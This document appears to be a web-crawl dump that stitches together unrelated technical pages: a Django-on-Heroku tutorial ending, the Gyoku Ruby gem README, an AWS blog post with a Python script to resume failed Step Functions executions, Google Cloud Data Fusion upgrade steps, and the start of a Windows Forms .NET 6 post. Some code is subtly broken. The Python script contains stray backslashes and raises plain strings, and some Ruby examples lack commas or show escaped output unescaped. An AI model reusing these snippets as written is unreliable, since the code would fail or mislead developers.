It still lets you choose whether to actually make any new migrations or not. When you’re doing a large migration that can take a while to complete, consider enabling the maintenance mode to avoid corrupting or losing the data while users are working with your app:
$ heroku maintenance:on Enabling maintenance mode for ⬢ polar-island-08305... done
Heroku will display this friendly page while in maintenance mode:
Don’t forget to disable it with
heroku maintenance:off once you’re done with your migration.
Populate the Database
You’ve created the database tables for your Django models by applying migrations, but those tables remain empty for the most part. You’ll want to get some data into them sooner or later. The best way to interact with your database is through the Django admin interface. To start using it, you must first create a superuser remotely:
$ heroku run python manage.py createsuperuser Running python manage.py createsuperuser on ⬢ polar-island-08305... up, run.2976 (Free) Username (leave blank to use 'u23948'): admin Email address: jdoe@company.com Password: Password (again): Superuser created successfully.
Remember to create the superuser in the database hooked up to your remote Heroku app by preceding the corresponding command with
heroku run. After providing a unique name and secure password for the superuser, you’ll be able to log in to the Django admin view and start adding records to your database.
You can access the Django admin view by visiting the
/admin path placed after your unique Heroku app domain name, for example:
Here’s how it should look after logging in:
One option to directly manipulate your remote database would be grabbing the
DATABASE_URL variable from Heroku and deciphering its individual components to connect through your favorite SQL client. Alternatively, the Heroku CLI provides a convenient
psql plugin, which works like the standard PostgreSQL interactive terminal but doesn’t require installing any software:
$ heroku psql --> Connecting to postgresql-round-16446 psql (10.17 (Ubuntu 10.17-0ubuntu0.18.04.1), server 13.3 (Ubuntu 13.3-1.pgdg20.04+1)) WARNING: psql major version 10, server major version 13. Some psql features might not work. SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off) Type "help" for help. polar-island-08305::DATABASE=> SELECT username, email FROM auth_user; username | email ----------+------------------ admin | jdoe@company.com (1 row)
Notice how the
heroku psql command connects you to the correct database on the Heroku infrastructure without requiring any details like the hostname, username, or password. Additionally, you didn’t have to install the PostgreSQL client to query one of the tables using SQL.
As a Django developer, you might be in the habit of relying on its object-relational mapper (ORM) instead of typing SQL queries manually. You can make use of the Heroku CLI again by starting the interactive Django shell in a remote Heroku app:
$ heroku run python manage.py shell Running python manage.py shell on ⬢ polar-island-08305... up, run.9914 (Free) Python 3.9.6 (default, Jul 02 2021, 15:33:41) [GCC 9.3.0] on linux Type "help", "copyright", "credits" or "license" for more information. (InteractiveConsole)
Next, import the built-in
User model and use its manager to retrieve the corresponding user objects from the database:
>>> from django.contrib.auth.models import User >>> User.objects.all() <QuerySet [<User: admin>]>
You should see the superuser that you created before. Using the Django shell lets you query the hooked-up database with an object-oriented API. If you don’t like the default shell, then you can install an alternative Python REPL such as IPython or bpython, and Django will recognize it.
Alright, that’s it! You have a fully-fledged Django project hosted on Heroku with a relational database hooked up. You can now share its public link in your README file on GitHub, for example, to let the world appreciate your work.
Conclusion
Now, you know how to turn your ideas into live web applications that your friends and family will love. Perhaps, someone from an HR department might stumble upon one of your projects and offer you a job. Signing up for a free Heroku account to host your Django code is one of the best ways to enter the world of cloud computing.
In this tutorial, you’ve learned how to:
- Take your Django project online in minutes
- Deploy your project to Heroku using Git
- Use a Django-Heroku integration library
- Hook your Django project up to a standalone relational database
- Manage the configuration along with sensitive data
You can download the final source code as well as the snapshots of the individual steps by following the link below:
Get Source Code: Click here to get the companion Django project as well as snapshots of the individual steps followed in this tutorial.
Next Steps
This tutorial barely scratched the surface when it comes to what’s possible with Heroku. It intentionally glossed over many fine details, but Heroku has much more to offer, even with the limited free account. Here are some ideas to consider if you want to take your project to the next level:
Configure a WSGI Server: Before making your project public, the first thing to do is replace the built-in Django development server with something more secure and performant, like Gunicorn. Django provides a handy deployment checklist with best practices you can go through.
Enable Logging: An app working in the cloud is not directly in your control, which makes debugging and troubleshooting more difficult than if it was running on your local machine. Therefore, you should enable logging with one of Heroku’s add-ons.
Serve static files: Use an external service such as Amazon S3 or a Content-Delivery Network (CDN) to host static resources like CSS, JavaScript, or pictures. This might offload your web server significantly and take advantage of caching for faster downloads.
Serve dynamic content: Due to Heroku’s ephemeral file system, data supplied to your app by the users can’t be persisted as local files. Using a relational or even a NoSQL database isn’t always the most efficient or convenient option. In such situations, you might want to use an external service like Amazon S3.
Add a custom domain: By default, your Heroku apps are hosted on the
.herokuapp.comdomain. While it’s quick and useful for a hobby project, you’ll probably want to use a custom domain in a more professional setting.
Add an SSL certificate: When you define a custom domain, you’ll have to provide a corresponding SSL certificate to expose your app over HTTPS. It’s a must-have in today’s world because some web browser vendors have already announced that they won’t display insecure websites in the future.
Hook up with GitHub: You can automate your deployments by allowing GitHub to trigger a new build and release when a pull request is merged to the master branch. This reduces the number of manual steps and keeps your source code secure.
Use Heroku Pipelines: Heroku encourages you to follow the best practices with minimal effort. It provides a continuous delivery workflow by optionally automating the creation of test environments.
Enable Autoscaling: As your application grows, it will need to face increased demand for resources. Most e-commerce platforms experience a spike in traffic every year around Christmas. The contemporary solution to that problem is horizontal scaling, which replicates your app in multiple copies to keep up with the demand. Autoscaling can respond to such spikes whenever needed.
Split into microservices: Horizontal scaling works best when your project consists of multiple independent microservices, which can be scaled individually. Such an architecture can lead to faster development time but comes with its own set of challenges.
Migrate from Heroku: Once you get your feet wet with Heroku, you might think about migrating to another cloud platform such as Google App Engine or even the underlying Amazon infrastructure to lower your cost.
Go ahead and explore the official documentation and Python tutorials on the Heroku website to find more details about these topics.
|
https://realpython.com/django-hosting-on-heroku/
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
Gyoku
Gyoku translates Ruby Hashes to XML.
Gyoku.xml(:find_user => { :id => 123, "v1:Key" => "api" }) # => "<findUser><id>123</id><v1:Key>api</v1:Key></findUser>"
Installation
Gyoku is available through Rubygems and can be installed via:
$ gem install gyoku
or add it to your Gemfile like this:
gem 'gyoku', '~> 1.0'
Hash keys
Hash key Symbols are converted to lowerCamelCase Strings.
Gyoku.xml(:lower_camel_case => "key") # => "<lowerCamelCase>key</lowerCamelCase>"
You can change the default conversion formula to
:camelcase,
:upcase or
:none.
Note that options are passed as a second Hash to the
.xml method.
Gyoku.xml({ :camel_case => "key" }, { :key_converter => :camelcase }) # => "<CamelCase>key</CamelCase>"
Hash key Strings are not converted and may contain namespaces.
Gyoku.xml("XML" => "key") # => "<XML>key</XML>"
Hash values
- DateTime objects are converted to xs:dateTime Strings
- Objects responding to :to_datetime (except Strings) are converted to xs:dateTime Strings
- TrueClass and FalseClass objects are converted to "true" and "false" Strings
- NilClass objects are converted to xsi:nil tags
- These conventions are also applied to the return value of objects responding to :call
- All other objects are converted to Strings using :to_s
Special characters
Gyoku escapes special characters unless the Hash key ends with an exclamation mark.
Gyoku.xml(:escaped => "<tag />", :not_escaped! => "<tag />") # => "<escaped><tag /></escaped><notEscaped><tag /></notEscaped>"
Self-closing tags
Hash Keys ending with a forward slash create self-closing tags.
Gyoku.xml(:"self_closing/" => "", "selfClosing/" => nil) # => "<selfClosing/><selfClosing/>"
Sort XML tags
In case you need the XML tags to be in a specific order, you can specify the order
through an additional Array stored under the
:order! key.
Gyoku.xml(:name => "Eve", :id => 1, :order! => [:id, :name]) # => "<id>1</id><name>Eve</name>"
XML attributes
Adding XML attributes is rather ugly, but it can be done by specifying an additional
Hash stored under the
:attributes! key.
Gyoku.xml(:person => "Eve", :attributes! => { :person => { :id => 1 } }) # => "<person id=\"1\">Eve</person>"
Explicit XML Attributes
In addition to using the
:attributes! key, you may also specify attributes through keys beginning with an "@" sign.
Since you'll need to set the attribute within the hash containing the node's contents, a
:content! key can be used
to explicity set the content of the node. The
:content! value may be a String, Hash, or Array.
This is particularly useful for self-closing tags.
Using :attributes!
Gyoku.xml( "foo/" => "", :attributes! => { "foo/" => { "bar" => "1", "biz" => "2", "baz" => "3" } } ) # => "<foo baz=\"3\" bar=\"1\" biz=\"2\"/>"
Using "@" keys and ":content!"
Gyoku.xml( "foo/" => { :@bar => "1", :@biz => "2", :@baz => "3", :content! => "" }) # => "<foo baz=\"3\" bar=\"1\" biz=\"2\"/>"
Example using "@" to get Array of parent tags each with @attributes & :content!
Gyoku.xml( "foo" => [ {:@name => "bar", :content! => 'gyoku'} {:@name => "baz", :@some => "attr", :content! => 'rocks!'} ]) # => "<foo name=\"bar\">gyoku</foo><foo name=\"baz\" some=\"attr\">rocks!</foo>"
Naturally, it would ignore :content! if tag is self-closing:
Gyoku.xml( "foo/" => [ {:@name => "bar", :content! => 'gyoku'} {:@name => "baz", :@some => "attr", :content! => 'rocks!'} ]) # => "<foo name=\"bar\"/><foo name=\"baz\" some=\"attr\"/>"
This seems a bit more explicit with the attributes rather than having to maintain a hash of attributes.
For backward compatibility,
:attributes! will still work. However, "@" keys will override
:attributes! keys
if there is a conflict.
Gyoku.xml(:person => {:content! => "Adam", :@id! => 0}) # => "<person id=\"0\">Adam</person>"
Example with ":content!", :attributes! and "@" keys
Gyoku.xml({ :subtitle => { :@lang => "en", :content! => "It's Godzilla!" }, :attributes! => { :subtitle => { "lang" => "jp" } } } # => "<subtitle lang=\"en\">It's Godzilla!</subtitle>"
The example above shows an example of how you can use all three at the same time.
Notice that we have the attribute "lang" defined twice.
The
@lang value takes precedence over the
:attribute![:subtitle]["lang"] value.
|
https://www.rubydoc.info/gems/gyoku/1.3.1
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
The star(*) operator unpacks the sequence/collection into positional arguments. So if you have a tuple and want to pass the items of that tuple as arguments for each position as they are there in the tuple, instead of indexing each element individually, you could just use the * operator.
def multiply(a, b): return a * b values = (1, 2) print(multiply(*values))
This will unpack the tuple so that it actually executes as −
print(multiply(1, 2))
This will give the output −
2
|
https://www.tutorialspoint.com/How-does-the-operator-work-on-a-tuple-in-Python
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
AWS Compute Blog
Resume AWS Step Functions from Any State
Update March, 5 2021 – Disclaimer: This blog precedes the introduction of map state to the Amazon States Language and requires modifications to work with the map state.
This post is written by Aaron Friedman, Partner Solutions Architect and Yash Pant, Solutions Architect.
When we discuss how to build applications with customers, we often align to the Well Architected Framework pillars of security, reliability, performance efficiency, cost optimization, and operational excellence. Designing for failure is an essential component to developing well architected applications that are resilient to spurious errors that may occur.
There are many ways you can use AWS services to achieve high availability and resiliency of your applications. For example, you can couple Elastic Load Balancing with Auto Scaling and Amazon EC2 instances to build highly available applications. Or use Amazon API Gateway and AWS Lambda to rapidly scale out a microservices-based architecture. Many AWS services have built in solutions to help with the appropriate error handling, such as Dead Letter Queues (DLQ) for Amazon SQS or retries in AWS Batch.
AWS Step Functions is an AWS service that makes it easy for you to coordinate the components of distributed applications and microservices. Step Functions allows you to easily design for failure, by incorporating features such as error retries and custom error handling from AWS Lambda exceptions. These features allow you to programmatically handle many common error modes and build robust, reliable applications.
In some rare cases, however, your application may fail in an unexpected manner. In these situations, you might not want to duplicate in a repeat execution those portions of your state machine that have already run. This is especially true when orchestrating long-running jobs or executing a complex state machine as part of a microservice. Here, you need to know the last successful state in your state machine from which to resume, so that you don’t duplicate previous work. In this post, we present a solution to enable you to resume from any given state in your state machine in the case of an unexpected failure.
Resuming from a given state
To resume a failed state machine execution from the state at which it failed, you first run a script that dynamically creates a new state machine. When the new state machine is executed, it resumes the failed execution from the point of failure. The script contains the following two primary steps:
- Parse the execution history of the failed execution to find the name of the state at which it failed, as well as the JSON input to that state.
- Create a new state machine, which adds an additional state to failed state machine, called “GoToState”. “GoToState” is a choice state at the beginning of the state machine that branches execution directly to the failed state, allowing you to skip states that had succeeded in the previous execution.
The full script along with a CloudFormation template that creates a demo of this is available in the aws-sfn-resume-from-any-state GitHub repo.
Diving into the script
In this section, we walk you through the script and highlight the core components of its functionality. The script contains a main function, which adds a command line parameter for the failedExecutionArn so that you can easily call the script from the command line:
python gotostate.py --failedExecutionArn '<Failed_Execution_Arn>'
Identifying the failed state in your execution
First, the script extracts the name of the failed state along with the input to that state. It does so by using the failed state machine execution history, which is identified by the Amazon Resource Name (ARN) of the execution. The failed state is marked in the execution history, along with the input to that state (which is also the output of the preceding successful state). The script is able to parse these values from the log.
The script loops through the execution history of the failed state machine, and traces it backwards until it finds the failed state. If the state machine failed in a parallel state, then it must restart from the beginning of the parallel state. The script is able to capture the name of the parallel state that failed, rather than any substate within the parallel state that may have caused the failure. The following code is the Python function that does this.
def parseFailureHistory(failedExecutionArn): ''' Parses the execution history of a failed state machine to get the name of failed state and the input to the failed state: Input failedExecutionArn = A string containing the execution ARN of a failed state machine y Output = A list with two elements: [name of failed state, input to failed state] ''' failedAtParallelState = False try: #Get the execution history response = client.get\_execution\_history( executionArn=failedExecutionArn, reverseOrder=True ) failedEvents = response['events'] except Exception as ex: raise ex #Confirm that the execution actually failed, raise exception if it didn't fail. try: failedEvents[0]['executionFailedEventDetails'] except: raise('Execution did not fail') ''' If you have a 'States.Runtime' error (for example, if a task state in your state machine attempts to execute a Lambda function in a different region than the state machine), get the ID of the failed state, and use it to determine the failed state name and input. ''' if failedEvents[0]['executionFailedEventDetails']['error'] == 'States.Runtime': failedId = int(filter(str.isdigit, str(failedEvents[0]['executionFailedEventDetails']['cause'].split()[13]))) failedState = failedEvents[-1 \* failedId]['stateEnteredEventDetails']['name'] failedInput = failedEvents[-1 \* failedId]['stateEnteredEventDetails']['input'] return (failedState, failedInput) ''' You need to loop through the execution history, tracing back the executed steps. The first state you encounter is the failed state. If you failed on a parallel state, you need the name of the parallel state rather than the name of a state within a parallel state that it failed on. This is because you can only attach goToState to the parallel state, but not a substate within the parallel state. This loop starts with the ID of the latest event and uses the previous event IDs to trace back the execution to the beginning (id 0). However, it returns as soon it finds the name of the failed state. ''' currentEventId = failedEvents[0]['id'] while currentEventId != 0: #multiply event ID by -1 for indexing because you're looking at the reversed history currentEvent = failedEvents[-1 \* currentEventId] ''' You can determine if the failed state was a parallel state because it and an event with 'type'='ParallelStateFailed' appears in the execution history before the name of the failed state ''' if currentEvent['type'] == 'ParallelStateFailed': failedAtParallelState = True ''' If the failed state is not a parallel state, then the name of failed state to return is the name of the state in the first 'TaskStateEntered' event type you run into when tracing back the execution history ''' if currentEvent['type'] == 'TaskStateEntered' and failedAtParallelState == False: failedState = currentEvent['stateEnteredEventDetails']['name'] failedInput = currentEvent['stateEnteredEventDetails']['input'] return (failedState, failedInput) ''' If the failed state was a parallel state, then you need to trace execution back to the first event with 'type'='ParallelStateEntered', and return the name of the state ''' if currentEvent['type'] == 'ParallelStateEntered' and failedAtParallelState: failedState = failedState = currentEvent['stateEnteredEventDetails']['name'] failedInput = currentEvent['stateEnteredEventDetails']['input'] return (failedState, failedInput) #Update the ID for the next execution of the loop currentEventId = currentEvent['previousEventId']
Create the new state machine
The script uses the name of the failed state to create the new state machine, with “GoToState” branching execution directly to the failed state.
To do this, the script requires the Amazon States Language (ASL) definition of the failed state machine. It modifies the definition to append “GoToState”, and create a new state machine from it.
The script gets the ARN of the failed state machine from the execution ARN of the failed state machine. This ARN allows it to get the ASL definition of the failed state machine by calling the DesribeStateMachine API action. It creates a new state machine with “GoToState”.
When the script creates the new state machine, it also adds an additional input variable called “resuming”. When you execute this new state machine, you specify this resuming variable as true in the input JSON. This tells “GoToState” to branch execution to the state that had previously failed. Here’s the function that does this:
def attachGoToState(failedStateName, stateMachineArn): ''' Given a state machine ARN and the name of a state in that state machine, create a new state machine that starts at a new choice state called 'GoToState'. "GoToState" branches to the named state, and sends the input of the state machine to that state, when a variable called "resuming" is set to True. Input failedStateName = A string with the name of the failed state stateMachineArn = A string with the ARN of the state machine Output response from the create_state_machine call, which is the API call that creates a new state machine ''' try: response = client.describe\_state\_machine( stateMachineArn=stateMachineArn ) except: raise('Could not get ASL definition of state machine') roleArn = response['roleArn'] stateMachine = json.loads(response['definition']) #Create a name for the new state machine newName = response['name'] + '-with-GoToState' #Get the StartAt state for the original state machine, because you point the 'GoToState' to this state originalStartAt = stateMachine['StartAt'] ''' Create the GoToState with the variable $.resuming. If new state machine is executed with $.resuming = True, then the state machine skips to the failed state. Otherwise, it executes the state machine from the original start state. ''' goToState = {'Type':'Choice', 'Choices':[{'Variable':'$.resuming', 'BooleanEquals':False, 'Next':originalStartAt}], 'Default':failedStateName} #Add GoToState to the set of states in the new state machine stateMachine['States']['GoToState'] = goToState #Add StartAt stateMachine['StartAt'] = 'GoToState' #Create new state machine try: response = client.create_state_machine( name=newName, definition=json.dumps(stateMachine), roleArn=roleArn ) except: raise('Failed to create new state machine with GoToState') return response
Testing the script
Now that you understand how the script works, you can test it out.
The following screenshot shows an example state machine that has failed, called “TestMachine”. This state machine successfully completed “FirstState” and “ChoiceState”, but when it branched to “FirstMatchState”, it failed.
Use the script to create a new state machine that allows you to rerun this state machine, but skip the “FirstState” and the “ChoiceState” steps that already succeeded. You can do this by calling the script as follows:
python gotostate.py --failedExecutionArn 'arn:aws:states:us-west-2:<AWS_ACCOUNT_ID>:execution:TestMachine-with-GoToState:b2578403-f41d-a2c7-e70c-7500045288595
This creates a new state machine called “TestMachine-with-GoToState”, and returns its ARN, along with the input that had been sent to “FirstMatchState”. You can then inspect the input to determine what caused the error. In this case, you notice that the input to “FirstMachState” was the following:
{ "foo": 1, "Message": true }
However, this state machine expects the “Message” field of the JSON to be a string rather than a Boolean. Execute the new “TestMachine-with-GoToState” state machine, change the input to be a string, and add the “resuming” variable that “GoToState” requires:
{ "foo": 1, "Message": "Hello!", "resuming":true }
When you execute the new state machine, it skips “FirstState” and “ChoiceState”, and goes directly to “FirstMatchState”, which was the state that failed:
Look at what happens when you have a state machine with multiple parallel steps. This example is included in the GitHub repository associated with this post. The repo contains a CloudFormation template that sets up this state machine and provides instructions to replicate this solution.
The following state machine, “ParallelStateMachine”, takes an input through two subsequent parallel states before doing some final processing and exiting, along with the JSON with the ASL definition of the state machine.
{ "Comment": "An example of the Amazon States Language using a parallel state to execute two branches at the same time.", "StartAt": "Parallel", "States": { "Parallel": { "Type": "Parallel", "ResultPath":"$.output", "Next": "Parallel 2", "Branches": [ { "StartAt": "Parallel Step 1, Process 1", "States": { "Parallel Step 1, Process 1": { "Type": "Task", "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA", "End": true } } }, { "StartAt": "Parallel Step 1, Process 2", "States": { "Parallel Step 1, Process 2": { "Type": "Task", "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA", "End": true } } } ] }, "Parallel 2": { "Type": "Parallel", "Next": "Final Processing", "Branches": [ { "StartAt": "Parallel Step 2, Process 1", "States": { "Parallel Step 2, Process 1": { "Type": "Task", "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXXX:function:LambdaB", "End": true } } }, { "StartAt": "Parallel Step 2, Process 2", "States": { "Parallel Step 2, Process 2": { "Type": "Task", "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB", "End": true } } } ] }, "Final Processing": { "Type": "Task", "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaC", "End": true } } }
First, use an input that initially fails:
{ "Message": "Hello!" }
This fails because the state machine expects you to have a variable in the input JSON called “foo” in the second parallel state to run “Parallel Step 2, Process 1” and “Parallel Step 2, Process 2”. Instead, the original input gets processed by the first parallel state and produces the following output to pass to the second parallel state:
{ "output": [ { "Message": "Hello!" }, { "Message": "Hello!" } ], }
Run the script on the failed state machine to create a new state machine that allows it to resume directly at the second parallel state instead of having to redo the first parallel state. This creates a new state machine called “ParallelStateMachine-with-GoToState”. The following JSON was created by the script to define the new state machine in ASL. It contains the “GoToState” value that was attached by the script.
{ "Comment":"An example of the Amazon States Language using a parallel state to execute two branches at the same time.", "States":{ "Final Processing":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaC", "End":true, "Type":"Task" }, "GoToState":{ "Default":"Parallel 2", "Type":"Choice", "Choices":[ { "Variable":"$.resuming", "BooleanEquals":false, "Next":"Parallel" } ] }, "Parallel":{ "Branches":[ { "States":{ "Parallel Step 1, Process 1":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA", "End":true, "Type":"Task" } }, "StartAt":"Parallel Step 1, Process 1" }, { "States":{ "Parallel Step 1, Process 2":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:LambdaA", "End":true, "Type":"Task" } }, "StartAt":"Parallel Step 1, Process 2" } ], "ResultPath":"$.output", "Type":"Parallel", "Next":"Parallel 2" }, "Parallel 2":{ "Branches":[ { "States":{ "Parallel Step 2, Process 1":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB", "End":true, "Type":"Task" } }, "StartAt":"Parallel Step 2, Process 1" }, { "States":{ "Parallel Step 2, Process 2":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB", "End":true, "Type":"Task" } }, "StartAt":"Parallel Step 2, Process 2" } ], "Type":"Parallel", "Next":"Final Processing" } }, "StartAt":"GoToState" }
You can then execute this state machine with the correct input by adding the “foo” and “resuming” variables:
{ "foo": 1, "output": [ { "Message": "Hello!" }, { "Message": "Hello!" } ], "resuming": true }
This yields the following result. Notice that this time, the state machine executed successfully to completion, and skipped the steps that had previously failed.
Conclusion
When you’re building out complex workflows, it’s important to be prepared for failure. You can do this by taking advantage of features such as automatic error retries in Step Functions and custom error handling of Lambda exceptions.
Nevertheless, state machines still have the possibility of failing. With the methodology and script presented in this post, you can resume a failed state machine from its point of failure. This allows you to skip the execution of steps in the workflow that had already succeeded, and recover the process from the point of failure.
To see more examples, please visit the Step Functions Getting Started page.
If you have questions or suggestions, please comment below.
|
https://aws.amazon.com/blogs/compute/resume-aws-step-functions-from-any-state/
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
table of contents
NAME¶
nvme — NVM Express
core driver
SYNOPSIS¶) or nda(4) to expose NVM Express namespaces as disk devices which can be partitioned. Note that in NVM Express terms, a namespace is roughly equivalent to a SCSI LUN.
DESCRIPTION¶
The
nvme driver provides support for NVM
Express (NVMe) controllers, such as:
- Hardware initialization
- Per-CPU IO queue pairs
- API for registering NVMe namespace consumers such as nvd(4) or nda(4)
- API for submitting NVM commands to namespaces
-¶ number of MSI-X vectors consumed by the device, set the following tunable value in loader.conf(5):
hw.nvme.min_cpus_per_ioq=X
To force legacy interrupts for all
nvme
driver instances, set the following tunable value in
loader.conf(5):
hw.nvme.force_intx=1
Note that use of INTx implies disabling of per-CPU I/O queue pairs.
To control maximum amount of system RAM in bytes to use as Host Memory Buffer for capable devices, set the following tunable:
hw.nvme.hmb_max
The default value is 5% of physical memory size per device.
The nvd(4) driver is used to provide a disk
driver to the system by default. The nda(4) driver can
also be used instead. The nvd(4) driver performs better
with smaller transactions and few TRIM commands. It sends all commands
directly to the drive immediately. The nda(4) driver
performs better with larger transactions and also collapses TRIM commands
giving better performance. It can queue commands to the drive; combine
BIO_DELETE commands into a single trip; and use the
CAM I/O scheduler to bias one type of operation over another. To select the
nda(4) driver, set the following tunable value in
loader.conf(5):
hw.nvme.verbose_cmd_dump=1
SYSCTL VARIABLES¶.
In addition to the typical pci attachment, the
nvme driver supports attaching to a
ahci(4) device. Intel's Rapid Storage Technology (RST)
hides the nvme device behind the AHCI device due to limitations in Windows.
However, this effectively hides it from the FreeBSD
kernel. To work around this limitation, FreeBSD
detects that the AHCI device supports RST and when it is enabled. See
ahci(4) for more details.
SEE ALSO¶
nda(4), nvd(4), pci(4), nvmecontrol(8), disk(9)
HISTORY¶
The
nvme driver first appeared in
FreeBSD 9.2.
AUTHORS¶>.
|
https://manpages.debian.org/bullseye/freebsd-manpages/nvme.4freebsd.en.html
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
You can upgrade your Cloud Data Fusion instances and batch pipelines to the latest platform and plugin versions to obtain the latest features, bug fixes, and performance improvements. The upgrade process involves instance and pipeline downtime (see Before you start).
Before you start
Plan a scheduled downtime for the upgrade. The process takes up to an hour.
Recommended: Before you upgrade, stop any running pipelines and disable any upstream triggers, such as Cloud Composer triggers. When the upgrade begins, all running pipelines stop. If you upgrade to versions 6.3 and above, if any pipelines are running beforehand, Cloud Data Fusion doesn't restart them. In earlier versions, Cloud Data Fusion attempts to restart them.
-
Install
curl.
Upgrading Cloud Data Fusion instances
To upgrade a Cloud Data Fusion instance to a new Cloud Data Fusion version:
In the Cloud Console, open the Instances page.
Click on
Instance Nameto open the Instance details page. This page lists instance information, including the
instance id,
region, current Cloud Data Fusion
version, logging and monitoring settings, and any instance labels.
Then perform the upgrade using either the Cloud Console or
gcloud command-line tool:
Console
Click Upgrade for a list of available versions.
Select the version that you prefer.
Click Upgrade.
Click View instance to access the upgraded instance.
Verify that the upgrade was successful by reloading the Instance details page, and then clicking.
gcloud
Run the following
gcloudcommand from a local terminal Cloud Shell session to upgrade to a new Cloud Data Fusion version. Add the --enable_stackdriver_logging, --enable_stackdriver_monitoring , and --labels flags if they apply to your instance.
gcloud beta data-fusion instances update \ --project=PROJECT_ID \ --location=REGION \ --version=NEW_VERSION_NUMBER INSTANCE_ID
After the command completes, verify that the upgrade was successful. From the Cloud Console, reload the Instance details page, and then click batch pipelines
To upgrade your Cloud Data Fusion batch pipelines to use the latest plugin versions:
Set environment variables.
Recommended: Backup all pipelines.
Run the following command, then copy the URL output to your browser to trigger a zip file download.
echo $CDAP_ENDPOINT/v3/export/apps
Unzip the downloaded file, then confirm that all pipelines were exported. The pipelines are organized by namespace.
Upgrade pipelines.
Create a variable that points to the
pipeline_upgrade.jsonfile that you will create in the next step to save a list of pipelines (insert the PATH to the file).
export PIPELINE_LIST=PATH/pipeline_upgrade.json
Create a list of all of the pipelines for an instance and namespace using the following command. The result is stored in the
$PIPELINE_LISTfile in
JSONformat. You can edit the list to remove pipelines that do not need to be upgraded. Set the NAMESPACE_ID field to the namespace where you want the upgrade to happen.
curl -H "Authorization: Bearer $(gcloud auth print-access-token)" -H "Content-Type: application/json" ${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/apps -o $PIPELINE_LIST
Upgrade the pipelines listed in
pipeline_upgrade.json. Insert the NAMESPACE_ID of pipelines to be upgraded. The command displays a list of upgraded pipelines with their upgrade status.
curl -N -H "Authorization: Bearer $(gcloud auth print-access-token)" -H "Content-Type: application/json" ${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/upgrade --data @$PIPELINE_LIST to enable Replication
Replication can be enabled in Cloud Data Fusion environments in version 6.3.0 or above. If you have version 6.2.3, upgrade to 6.3.0, and then enable Replication.
Granting roles for upgraded instances
If you upgrade an instance from Cloud Data Fusion version 6.1.x to versions 6.2.0 or above, after the upgrade completes, grant the Cloud Data Fusion runner role and Cloud Storage admin role to Dataproc service account in your project.
Adding network tags
Network tags are preserved in your compute profiles when you upgrade from Cloud Data Fusion versions 6.2.x and above to a higher version.
If you upgrade from version 6.1.x to version 6.2.0 and above, network tags are not preserved. This might cause your Dataproc cluster to get stuck in provisioning state, especially if your environment has restrictive networking and security policies.
Instead, in each updated instances, manually add your network tags to each of the compute profiles it uses.
To add the network tags to a compute profile:
In the Google Cloud Console, open the Cloud Data Fusion Instances page.
Click View Instance.
Click System Admin.
Click the Configuration tab.
Expand the System Compute Profiles box.
Click Create New Profile. A page of provisioners opens.
Click Dataproc.
Enter your desired profile information, including your network tags.
Click Create.
After you add the tags, use the updated profile in your pipeline. The new tags are preserved in future releases.
Available versions for your upgrade
In general, when you upgrade, we recommend using the latest version of Cloud Data Fusion environment so that your instances run in a supported environment for the longest possible time frame. For more information, see the Version support policy. Depending on your original version, upgrades to some versions might not be available. In those cases, you can upgrade to a version that supports upgrades to your desired version.
Cloud Data Fusion supports the following version upgrades:
Troubleshooting
When you upgrade to version 6.4, there is a known issue with the Joiner plugin where you cannot see join conditions. For more information, see the Troubleshooting page.
|
https://cloud.google.com/data-fusion/docs/how-to/upgrading
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
What’s new in Windows Forms in .NET 6.0
Igor
We continue to support and innovate in Windows Forms runtime. Let’s recap what we’ve done in .NET 6.0.
Accessibility improvements and fixes
Making Windows Forms applications more accessible to more users is one of the big goals for the team. Building on the momentum we gained in .NET 5.0 timeframe in this release we delivered further improvements, including but not limited to the following:
- Improved support for assistive technology when using Windows Forms apps. UIA providers enable tools like Narrator and others to interact with the elements of an application. UIA is also often used to create test automation to drive apps. We have now added UIA providers support for the following controls:
CheckedListBox
LinkLabel
Panel
ScrollBar
TabControl
TrackBar
- Improved Narrator announcements in
DataGridView,
ErrorProviderand
ListViewcolumn header controls.
- Keyboard tooltips for the
TabControl’s
TabPageand the
TreeView’s
TreeNodecontrols.
- ScrollItem Control Pattern support for
ComboBoxItemAccessibleObject.
- Corrected control types for better support of Text Control Patterns.
- ExpandCollapse Control Pattern support for the
DateTimePickercontrol.
- Invoke Control Pattern support for the UpDownButtons component in
DomainUpDownand
NumericUpDowncontrols.
- Improved color contrast in the following controls:
CheckedListBox
DataGridView
Label
PropertyGridView
ToolStripButton
Application bootstrap
In .NET Core 3.0 we started to modernize and rejuvenate Windows Forms. As part of that initiative we changed the default font to Segoe UI, 9f (dotnet/winforms#656), and quickly learned that a great number of things depended on this default font metrics. For example, the designer was no longer a true WYSIWYG, as Visual Studio process is run under .NET Framework 4.7.2 and uses the old default font (Microsoft Sans Serif, 8.25f), and .NET application at runtime uses the new font. This change also made it harder for some customers to migrate their large applications with pixel-perfect layouts. Whilst we had provided migration strategies, applying those across hundreds of forms and controls could be a significant undertaking.
To make it easier to migrate those pixel-perfect apps we introduced a new API (for more details refer to the Application-wide default font post):
void Application.SetDefaultFont(Font font)
However, this API wasn’t sufficient to address the designer’s ability to render forms and controls with the same new font. At the same time, with our sister teams heavily pushing for little code/low ceremony application templates, our
Program.cs and its
Main() method started looking very dated, and we decided to follow the general .NET trend and trim the boilerplate. Please welcome the new Windows Forms application bootstrap:
